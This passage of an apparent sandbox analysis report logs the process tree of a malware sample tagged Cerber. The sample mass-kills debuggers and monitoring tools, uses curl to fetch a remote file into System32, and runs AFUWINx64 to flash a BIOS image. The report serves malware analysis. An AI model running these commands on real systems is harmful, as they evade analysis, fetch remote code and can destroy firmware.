C:\Windows\system32\taskkill.exetaskkill /f /im de4dot.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Cheat Engine.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-i386.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-i386.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTP Debugger Windows Service (32 bit).exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x64dbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x32dbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Taskmgr.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumperClient.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent -o C:\Windows\System32\Tasks\Mac.bat -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" https://github.com/zer0gra/perm-files/raw/main/BIOS.rom2⤵
-
C:\Windows\system32\curl.execurl --silent -o C:\Windows\System32\Tasks\Mac.bat -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" https://github.com/zer0gra/perm-files/raw/main/BIOS.rom3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im ProcessHacker.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im idaq64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Wireshark.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Fiddler.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im FiddlerEverywhere.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Xenos32.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /o2⤵
-
C:\Windows\System32\AFUWINx64.EXEC:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /o3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im de4dot.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /p2⤵
-
C:\Windows\System32\AFUWINx64.EXEC:\Windows\System32\AFUWINx64.EXE C:\Windows\System32\BIOS.rom /p3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Cheat Engine.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im MugenJinFuu-i386.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-x86_64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cheatengine-i386.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTP Debugger Windows Service (32 bit).exe3⤵
- Cerber
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumper.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x64dbg.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im x32dbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
- Cerber
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg64.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Dbg32.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Taskmgr.exe3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im KsDumperClient.exe3⤵
- Kills process with taskkill
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff91de846f8,0x7ff91de84708,0x7ff91de847182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4488 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3524 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3524 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4304 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,12817562409308089753,3116108464962910092,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:12⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD599afa4934d1e3c56bbce114b356e8a99
SHA13f0e7a1a28d9d9c06b6663df5d83a65c84d52581
SHA25608e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8
SHA51276686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da
-
Filesize
152B
MD5443a627d539ca4eab732bad0cbe7332b
SHA186b18b906a1acd2a22f4b2c78ac3564c394a9569
SHA2561e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9
SHA512923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d
-
Filesize
1KB
MD5c3bf94fd0937589e8de9ef53a1aab797
SHA120b7e516dd04a54879a77b2dc40644850d788803
SHA256d14cc6a93db0d4de885ca2886f34b4b7908157d6bb29da2da5a833d21361c044
SHA51241bf26600ec966befece29f5a93c9b41cff7d6ff3ddba36e7cea857b9b27f6a04b015a6cefa5486365c67a5555454360bb132f68c4ca0519f2b1754bdcf7b91a
-
Filesize
471B
MD5f92724d1d57621f2775adfc5ffc1351c
SHA16526139e9adf6a2d6c19ce1368da7419cd280301
SHA256cb3bef47d4b1a3491f3713825d4ffb6107b83c9bd06c6e0b0d459f6fe35c329f
SHA512048e1c58e17449a28cd17216aaf4f24941bf3258b26de4a86baf182c997065b738df604ff8a7fddcc97285b38e685bb4672a46601ee0d42716c803990eb5d8d4
-
Filesize
6KB
MD5d300948e52592bbb4e889b8010dbcf1e
SHA1a95bda71ccf4edd6afff55b35c051b9990952767
SHA2568dfb78df9b007c925b913e5d76b2bfaafd8bdecc431aead86fb4860950ca7323
SHA512a0fe96f2c92532ff25fd02566c62d44e77b93959094d08fe01bc07cbdb93f15343868c58746be05775102c8b450e29bbc7ff613698290a8ab5af77b76063c1c5
-
Filesize
5KB
MD57723e6dc7e723e2ec9e337687c9c203b
SHA16e074f00ae0649ce10acb07e7b563affa09bba9a
SHA256c6750255af5f447096701f4f746f2982efe003bf7242070ed028455e1d3a65cd
SHA512e3a323d823ab706003054d0ec9c1ba855f00b333c8fbe8b6e05b07af4e80ad227a088684482291f83abe421c253e9aa9fd6bd3902846afb2305ef381c776a269
-
Filesize
6KB
MD53f8fc7aa6b580632bd91f66ccde55560
SHA1d3bec9b59aa8663a66bba5b24ac3b6831ef97545
SHA2568307008151398016d3379fab9c11013a5c05a2a22b27d57329ff729c3c6433cb
SHA512d3aa7e2323e7102b17a03f29c75f75ad820ac38bcebb4050c56552813879f10d4ad3ffc44d9092290b797585d839dbe53f60cbe597202d9ef3d86cafe5f9dec4
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
10KB
MD584fd9cd832b356f58307bd2d4e3413c2
SHA18252c514cbc85773c3f30dcde959f0fdf8b20b55
